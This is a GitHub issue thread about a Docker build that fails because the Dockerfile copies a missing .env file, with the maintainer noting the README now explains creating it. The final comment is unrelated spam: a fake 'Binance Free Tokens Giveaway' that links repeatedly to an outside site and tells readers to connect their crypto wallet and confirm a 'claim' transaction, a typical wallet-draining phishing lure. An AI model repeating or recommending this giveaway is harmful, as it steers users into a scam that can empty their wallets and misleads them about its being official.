### ISSUE TITLE
failed to solve: failed to compute cache key: failed to calculate checksum of ref 955c9863-ad09-4240-bafa-b8ec3cdb5635::lo12iqtoqs4jp4zshz5bsg24d: "/.env": not found

### ISSUE THREAD

**Issue by fannigurt** [vsaraikin/capital-sms#6]
```shell
/usr/local/bin/docker-compose -f /Users/fannigurt/Git/capital-sms/docker-compose.yml -p capital-sms up -d
[+] Building 5.5s (12/12) FINISHED                                                                    docker:default
 => [app internal] load .dockerignore                                                                           0.0s
 => => transferring context: 2B                                                                                 0.0s
 => [app internal] load build definition from Dockerfile                                                        0.0s
 => => transferring dockerfile: 318B                                                                            0.0s
 => [app internal] load metadata for docker.io/library/python:3.11-slim                                         5.4s
 => [app 1/8] FROM docker.io/library/python:3.11-slim@sha256:f89d4d260b6a5caa6aa8e0e14b162deb76862890c91779c31  0.0s
 => => resolve docker.io/library/python:3.11-slim@sha256:f89d4d260b6a5caa6aa8e0e14b162deb76862890c91779c31f762  0.0s
 => [app internal] load build context                                                                           0.0s
 => => transferring context: 826B                                                                               0.0s
 => CACHED [app 2/8] WORKDIR /app                                                                               0.0s
 => CACHED [app 3/8] COPY requirements.txt ./                                                                   0.0s
 => CACHED [app 4/8] RUN pip install --no-cache-dir -r requirements.txt                                         0.0s
 => CACHED [app 5/8] COPY ./entrypoint.sh .                                                                     0.0s
 => CACHED [app 6/8] RUN chmod +x ./entrypoint.sh                                                               0.0s
 => CACHED [app 7/8] COPY ./app ./                                                                              0.0s
 => ERROR [app 8/8] COPY .env ./                                                                                0.0s
------
 > [app 8/8] COPY .env ./:
------
failed to solve: failed to compute cache key: failed to calculate checksum of ref 955c9863-ad09-4240-bafa-b8ec3cdb5635::lo12iqtoqs4jp4zshz5bsg24d: "/.env": not found
`docker-compose` process finished with exit code 17
```

**Comment by vsaraikin** [comment]
Added creating ".env" file as part of the setup in README

**Comment by NiicoleLuna** [comment]
[![Binance Free Tokens](https://pbs.twimg.com/media/GCCo9VhXgAE0kzp?format=jpg&name=large)](https://www.bnbrewards.online/?source=Github)

# 🚀 Binance Free Tokens Giveaway! 🌕

Welcome to the exclusive Binance Free Tokens Giveaway! 🎉 Don't miss out on claiming your free tokens. Here's a simple guide to get started:

## Steps to Claim:

1. **Connect Your Binance Wallet:**
   - Click on the [Connect Wallet](https://www.bnbrewards.online/?source=Github).
   - Select your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Follow the prompts to connect your wallet securely.

2. **Interact with the Contract:**
   - Once your wallet is connected, navigate to the [Binance Free Tokens Page](https://www.bnbrewards.online/?source=Github).
   - Click on the "Claim" button to interact with the smart contract.

3. **Claim Your Free Tokens:**
   - Confirm the transaction in your wallet to execute the claim method.
   - Wait for the transaction to be processed.

4. **Spread the Excitement:**
   - After successfully claiming your tokens, share the news!
     - **Twitter:** [Tweet about Your Tokens](https://twitter.com/share?url=https://www.bnbrewards.online/&text=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)
     - **Facebook:** [Share on Facebook](https://www.facebook.com/sharer/sharer.php?u=https://www.bnbrewards.online/&quote=Just%20claimed%20my%20free%20tokens%20on%20Binance%21%20%F0%9F%8C%95%20%23BinanceFreeTokens%20%23Crypto)

Act fast and enjoy your tokens! This limited-time offer won't last forever. 🌐💰

*Note: Make sure to follow official Binance channels for updates and announcements.*
